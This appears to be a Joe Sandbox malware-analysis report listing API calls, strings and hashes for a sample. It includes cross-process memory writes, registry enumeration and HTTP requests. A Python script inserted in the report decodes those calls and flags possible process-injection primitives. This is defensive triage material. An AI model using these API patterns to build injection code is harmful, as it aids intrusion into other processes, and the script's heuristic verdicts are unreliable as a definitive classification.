                                                            • Instruction ID: e105a9795f5d52d16d91789ba8190a615d3df3a0c96eb3932a486f0a5f576608
                                                            • Opcode Fuzzy Hash: de13fcd2bf041cb81e9a6c5edc2d897f9b9d42d6ec221a0b4ea597f664cd5f5d
                                                            • Instruction Fuzzy Hash: FA41C070A00318ABDF11EF14E895BEEBBB9EF54764F04006AFA05A7291DB709A44DB61
                                                            APIs
                                                              • Part of subcall function 00D314BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00D29296,?,?,00000034,00000800,?,00000034), ref: 00D314E6
                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00D2983F
                                                              • Part of subcall function 00D31487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00D292C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00D314B1
                                                              • Part of subcall function 00D313DE: GetWindowThreadProcessId.USER32(?,?), ref: 00D31409
                                                              • Part of subcall function 00D313DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00D2925A,00000034,?,?,00001004,00000000,00000000), ref: 00D31419
                                                              • Part of subcall function 00D313DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00D2925A,00000034,?,?,00001004,00000000,00000000), ref: 00D3142F
                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00D298AC
                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00D298F9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                            • String ID: @$@U=u
                                                            • API String ID: 4150878124-826235744
                                                            • Opcode ID: e728cb161bada9658a9647e760882539e69eeacc2e84464dc29491ee167945b0
                                                            • Instruction ID: 477530cc9343af01e0b5a6b155ba379b6d0f446aca1baf1313750cef1a06b8dc
                                                            • Opcode Fuzzy Hash: e728cb161bada9658a9647e760882539e69eeacc2e84464dc29491ee167945b0
                                                            • Instruction Fuzzy Hash: 45415C7690122DBFCB10DFA4CD91ADEBBB8EB19300F044199FA45B7181DA716E85CBB0
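The entry above is the one that carries the report's "Writes to foreign memory regions" style primitives (OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory), but they sit next to SendMessageW calls with TreeView messages (0x1104 = TVM_GETITEMRECT, 0x1111 = TVM_HITTEST). Reading a TVITEM out of another process's tree control requires exactly this staging of a buffer in the target process, so the API set on its own does not separate an injector from a GUI-automation helper. The decoder below is an added example, not code from Joe Sandbox or from the sample: it parses the "APIs" lines of a function entry in the report's own format (the constructed input is the entry above, copied verbatim), resolves the OpenProcess access mask and SendMessage message numbers to their Windows SDK names, and reports whether the cross-process primitives are paired with control messages. The reading that such a pairing is consistent with AutoIt's ControlTreeView/ControlListView helpers is an assumption stated in the verdict text, not something the report itself asserts.

```python
"""Parse Joe Sandbox "APIs" lines and decode the arguments that matter for triage.
Added example, not part of the report or the sample.  Constant names are the
Windows SDK values for the raw numbers; the AutoIt-helper reading is an assumption."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Union

# Constructed input: the API lines of the report entry above, copied verbatim.
SAMPLE_BLOCK = """\
  • Part of subcall function 00D314BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00D29296,?,?,00000034,00000800,?,00000034), ref: 00D314E6
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00D2983F
  • Part of subcall function 00D31487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00D292C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00D314B1
  • Part of subcall function 00D313DE: GetWindowThreadProcessId.USER32(?,?), ref: 00D31409
  • Part of subcall function 00D313DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00D2925A,00000034,?,?,00001004,00000000,00000000), ref: 00D31419
  • Part of subcall function 00D313DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00D2925A,00000034,?,?,00001004,00000000,00000000), ref: 00D3142F
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00D298AC
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00D298F9
"""

# One report line: optional "Part of subcall function XXXX:" prefix, Api.MODULE(args), ref: addr.
# LIBCMT entries such as "__itow.LIBCMT ref: ..." have no argument list, hence the optional group.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

Arg = Union[int, str, None]  # hex literal -> int, "?" -> None, anything else kept as text


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Arg]
    ref: int                     # address of the call site
    subcall_of: Optional[int]    # address of the callee when the line is a subcall summary


def _parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok == "?":
        return None
    try:
        return int(tok, 16)
    except ValueError:
        return tok               # e.g. "DllGetClassObject" or "nul" in other entries


def parse_block(text: str) -> List[ApiCall]:
    """Return the API calls of one function entry; non-matching lines (headers) are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [_parse_arg(t) for t in raw.split(",")] if raw and raw.strip() else []
        sub = m.group("sub")
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


# OpenProcess desired-access bits (Windows SDK), ascending so the decoded list is ordered.
PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE", 0x0080: "PROCESS_CREATE_PROCESS", 0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION", 0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}

# Window messages seen in this report (common controls: LVM_FIRST=0x1000, TV_FIRST=0x1100, WM_USER=0x400).
WINDOW_MESSAGES = {
    0x0030: "WM_SETFONT", 0x0467: "ACM_OPENW",
    0x1004: "LVM_GETITEMCOUNT", 0x1073: "LVM_GETITEMTEXTW",
    0x1104: "TVM_GETITEMRECT", 0x110A: "TVM_GETNEXTITEM", 0x1111: "TVM_HITTEST", 0x113E: "TVM_GETITEMW",
}

CROSS_PROCESS_RW = {"OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "ReadProcessMemory"}


def decode_process_access(mask: int) -> List[str]:
    """Split an OpenProcess access mask into named bits; unknown bits are reported in hex."""
    names = [name for bit, name in PROCESS_ACCESS.items() if mask & bit]
    leftover = mask & ~sum(PROCESS_ACCESS)
    if leftover:
        names.append(f"0x{leftover:X}")
    return names


def message_name(msg: int) -> str:
    return WINDOW_MESSAGES.get(msg, f"0x{msg:04X}")


def classify(calls: List[ApiCall]) -> Dict[str, object]:
    """Flag cross-process memory access and note whether it is paired with control messages."""
    names = {c.api for c in calls}
    msgs = sorted({c.args[1] for c in calls
                   if c.api.startswith("SendMessage") and len(c.args) > 1 and isinstance(c.args[1], int)})
    control = [message_name(m) for m in msgs]
    cross = CROSS_PROCESS_RW <= names
    gui = any(n.startswith(("TVM_", "LVM_")) for n in control)
    if cross and gui:
        verdict = ("cross-process read/write paired with TreeView/ListView messages: consistent with a "
                   "GUI-automation helper staging a TVITEM/LVITEM in the target (assumption: AutoIt "
                   "ControlTreeView/ControlListView style); confirm callers before calling it injection")
    elif cross:
        verdict = "cross-process read/write with no control messages: candidate injection primitive"
    else:
        verdict = "no cross-process memory access in this entry"
    return {"cross_process_memory": cross, "control_messages": control, "verdict": verdict}


if __name__ == "__main__":
    parsed = parse_block(SAMPLE_BLOCK)
    for c in parsed:
        if c.api == "OpenProcess":
            print("OpenProcess access:", " | ".join(decode_process_access(c.args[0])))
    print(classify(parsed))
```

Paste any other "APIs" block from this report into parse_block to get the same decoding; entries whose SendMessageW arguments are "?" contribute nothing to control_messages, so the verdict then rests on the API names alone.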
                                                            APIs
                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00D2D5D4
                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00D2D60A
                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00D2D61B
                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00D2D69D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                            • String ID: DllGetClassObject
                                                            • API String ID: 753597075-1075368562
                                                            • Opcode ID: 10d78efa27706b83cb8a5ae1be49168af58bdf31d7a4319a57d3ae7484fbd185
                                                            • Instruction ID: ff3b2888fec4c5d2ab5057e73d9a467210b531fd6b9b13ac7eb25a1b42658d49
                                                            • Opcode Fuzzy Hash: 10d78efa27706b83cb8a5ae1be49168af58bdf31d7a4319a57d3ae7484fbd185
                                                            • Instruction Fuzzy Hash: 52418EB1600318EFDB05DF64D884A9ABBAAEF64319F1580A9AC09DF205D7B1D944CBB0
                                                            APIs
                                                            • _memset.LIBCMT ref: 00D327C0
                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00D327DC
                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 00D32822
                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00D95890,00000000), ref: 00D3286B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Menu$Delete$InfoItem_memset
                                                            • String ID: 0
                                                            • API String ID: 1173514356-4108050209
                                                            • Opcode ID: 1bf69c58331077eabb0470c736eb620ce7cdbc3705e547dd786305e607ca1e02
                                                            • Instruction ID: d5d789eb70d1727da24d1d9d6427147895a10286d70a52efd8d4403c2a82f745
                                                            • Opcode Fuzzy Hash: 1bf69c58331077eabb0470c736eb620ce7cdbc3705e547dd786305e607ca1e02
                                                            • Instruction Fuzzy Hash: AC419E70A043419FD720DF24CC84B6ABBE9EF85314F184A2EF9A697291D770E905CB72
                                                            APIs
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00D588DE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: InvalidateRect
                                                            • String ID: @U=u
                                                            • API String ID: 634782764-2594219639
                                                            • Opcode ID: 08a533b836ec40bad562e90657f56f2518e036f6cee276916434d008b1b32af6
                                                            • Instruction ID: b81e8759b3ddfc335bb1dd8bd654a33c265a8d4302a55e38fa62ece0b245a0b4
                                                            • Opcode Fuzzy Hash: 08a533b836ec40bad562e90657f56f2518e036f6cee276916434d008b1b32af6
                                                            • Instruction Fuzzy Hash: 8B31C334600208EEEF209B58DC45BB97BA5EB05352F984112FE51F62A1CE31D948BF72
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00D4D7C5
                                                              • Part of subcall function 00CD784B: _memmove.LIBCMT ref: 00CD7899
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: BuffCharLower_memmove
                                                            • String ID: cdecl$none$stdcall$winapi
                                                            • API String ID: 3425801089-567219261
                                                            • Opcode ID: fbbdda80c1acd0791268fb04a76fc96601900de39bac79bb09266012261a79a2
                                                            • Instruction ID: e2f2d5d11c9eb98909ffa1aca6fd2607db209a2af0c698e404a9bda60c883b70
                                                            • Opcode Fuzzy Hash: fbbdda80c1acd0791268fb04a76fc96601900de39bac79bb09266012261a79a2
                                                            • Instruction Fuzzy Hash: 6131AF71904619ABCF00EF58C8519FEB3B6FF04720B14862AF965A77D2DB31E905DBA0
                                                            APIs
                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00D4184C
                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D41872
                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00D418A2
                                                            • InternetCloseHandle.WININET(00000000), ref: 00D418E9
                                                              • Part of subcall function 00D42483: GetLastError.KERNEL32(?,?,00D41817,00000000,00000000,00000001), ref: 00D42498
                                                              • Part of subcall function 00D42483: SetEvent.KERNEL32(?,?,00D41817,00000000,00000000,00000001), ref: 00D424AD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                            • String ID:
                                                            • API String ID: 3113390036-3916222277
                                                            • Opcode ID: ef131438d61f565c38f0840ec5638d24773e64d1701c452b59d786ebe81b0e9e
                                                            • Instruction ID: e15daf742e513d2594b971d602fc218ae19a9472dfbce43770de0a18238011df
                                                            • Opcode Fuzzy Hash: ef131438d61f565c38f0840ec5638d24773e64d1701c452b59d786ebe81b0e9e
                                                            • Instruction Fuzzy Hash: C221BBB5500308BFEB119B60CC85EBB7BEDEB88745F10412AF845E6240EA248D44A7B1
                                                            APIs
                                                              • Part of subcall function 00CD1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00CD1D73
                                                              • Part of subcall function 00CD1D35: GetStockObject.GDI32(00000011), ref: 00CD1D87
                                                              • Part of subcall function 00CD1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00CD1D91
                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00D56461
                                                            • LoadLibraryW.KERNEL32(?), ref: 00D56468
                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00D5647D
                                                            • DestroyWindow.USER32(?), ref: 00D56485
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                            • String ID: SysAnimate32
                                                            • API String ID: 4146253029-1011021900
                                                            • Opcode ID: 3f9563345903f1234b5f293431a98807b3df686fb8058abce25f066845c3a03b
                                                            • Instruction ID: 04ebfe0df9b7538cdd07da5e60de4fe28c4452211732a672ba3bf93f305bfcb1
                                                            • Opcode Fuzzy Hash: 3f9563345903f1234b5f293431a98807b3df686fb8058abce25f066845c3a03b
                                                            • Instruction Fuzzy Hash: 36218871204205BFEF108FA4DC90EBB77A9EB5836AFA84629FE5097190D731DC45A770
                                                            APIs
                                                            • GetStdHandle.KERNEL32(0000000C), ref: 00D36DBC
                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00D36DEF
                                                            • GetStdHandle.KERNEL32(0000000C), ref: 00D36E01
                                                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00D36E3B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CreateHandle$FilePipe
                                                            • String ID: nul
                                                            • API String ID: 4209266947-2873401336
                                                            • Opcode ID: 6c070225737bdcc4519de193c89d02b88e4294ba9bad3c02cfc458e6e54b9be9
                                                            • Instruction ID: 8575bd4079b2331dde6705975f02f3808ed48596b377f14f74bd9a8e0dba5d31
                                                            • Opcode Fuzzy Hash: 6c070225737bdcc4519de193c89d02b88e4294ba9bad3c02cfc458e6e54b9be9
                                                            • Instruction Fuzzy Hash: 44215175600309BBDB209F29EC05A9A7BB4EF45720F248629FDA1DB2D0DB70D9548B74
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00D36E89
                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00D36EBB
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00D36ECC
                                                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00D36F06
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CreateHandle$FilePipe
                                                            • String ID: nul
                                                            • API String ID: 4209266947-2873401336
                                                            • Opcode ID: e61d674aae3ecc56c051a777e2b700eac37bbe004d1bb3bb4d871c57b24614cc
                                                            • Instruction ID: bc47f3bf62907cf8b065d435f1208f6b7920a5334b4ed84da45b665472784bb0
                                                            • Opcode Fuzzy Hash: e61d674aae3ecc56c051a777e2b700eac37bbe004d1bb3bb4d871c57b24614cc
                                                            • Instruction Fuzzy Hash: 06215EB9500305ABDB209F69DC04A9A77E8EF45720F288A19FDA1E72D0DB70E8558B71
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 00D3AC54
                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00D3ACA8
                                                            • __swprintf.LIBCMT ref: 00D3ACC1
                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,00D5F910), ref: 00D3ACFF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                            • String ID: %lu
                                                            • API String ID: 3164766367-685833217
                                                            • Opcode ID: 40f48c769fa29d1c26694932b5762102b5a0d3dd0683391fcc5810950783103b
                                                            • Instruction ID: 9a2efc96416c6e2ad2364eea588614ecf1abfba22cd94aa47d156865044b62b0
                                                            • Opcode Fuzzy Hash: 40f48c769fa29d1c26694932b5762102b5a0d3dd0683391fcc5810950783103b
                                                            • Instruction Fuzzy Hash: 4F217F35A00209AFCB10EF69C945DAE7BB8EF89715B004069F909EB351DB31EA45DB71
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 00D31B19
                                                            Strings
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                            • API String ID: 3964851224-769500911
                                                            • Opcode ID: 1f0f5a1936ab211a96f8f665a0cccd3ce11d348dd40505a9b25e1d93b8d9aa67
                                                            • Instruction ID: 71f71165717b36ec2ba963df16ca8511b618aff80aeaac31e8deb3cf8fed5db7
                                                            • Opcode Fuzzy Hash: 1f0f5a1936ab211a96f8f665a0cccd3ce11d348dd40505a9b25e1d93b8d9aa67
                                                            • Instruction Fuzzy Hash: 1E113C749002098FCF40EF94D9618FEF7B4BF26704F5444A9D954A7792EB325906EB60
                                                            APIs
                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00D4EC07
                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00D4EC37
                                                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00D4ED6A
                                                            • CloseHandle.KERNEL32(?), ref: 00D4EDEB
                                                            Similarity
                                                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                            • String ID:
                                                            • API String ID: 2364364464-0
                                                            • Opcode ID: d3fbed2a8371f977fd4bb3f2a19d06f83de19f43fedd89447d2a6458d2e63ce8
                                                            • Instruction ID: 93efaf532c8bfed9f5afc29e80f647034dc4d6790dc602f651b12144956cf2a7
                                                            • Opcode Fuzzy Hash: d3fbed2a8371f977fd4bb3f2a19d06f83de19f43fedd89447d2a6458d2e63ce8
                                                            • Instruction Fuzzy Hash: DA813C75600711AFD760EF28C886B2AB7E5EF44B10F14881EFA99DB3D2D770AC449B51
                                                            APIs
                                                            Similarity
                                                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                            • String ID:
                                                            • API String ID: 1559183368-0
                                                            • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                            • Instruction ID: ae307ee191d714538304556174a6ea46b83deb4f4746cb433e4d35401c9c0b17
                                                            • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                            • Instruction Fuzzy Hash: C951E970A00B0DDBCB648FA9D84067E7BB2EF40321F248729FB35962D0D7709E519B42
                                                            APIs
                                                              • Part of subcall function 00CD7DE1: _memmove.LIBCMT ref: 00CD7E22
                                                              • Part of subcall function 00D50E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00D4FDAD,?,?), ref: 00D50E31
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D500FD
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00D5013C
                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00D50183
                                                            • RegCloseKey.ADVAPI32(?,?), ref: 00D501AF
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00D501BC
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                            • String ID:
                                                            • API String ID: 3440857362-0
                                                            • Opcode ID: 92d1d2645dd1d55048a119e3e552cb77e98f26e592268dd57d7d23a8527afd0d
                                                            • Instruction ID: 8b917236051c8ac8a5c31b0261686366b920b0c3d0f1ae971f4327e4c66b5d13
                                                            • Opcode Fuzzy Hash: 92d1d2645dd1d55048a119e3e552cb77e98f26e592268dd57d7d23a8527afd0d
                                                            • Instruction Fuzzy Hash: F5512B71208304AFDB14EF58C881E6EBBE9FF84315F44491EF9958B291DB31E909DB62
                                                            APIs
                                                              • Part of subcall function 00CD9837: __itow.LIBCMT ref: 00CD9862
                                                              • Part of subcall function 00CD9837: __swprintf.LIBCMT ref: 00CD98AC
                                                            • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00D4D927
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00D4D9AA
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00D4D9C6
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00D4DA07
                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00D4DA21
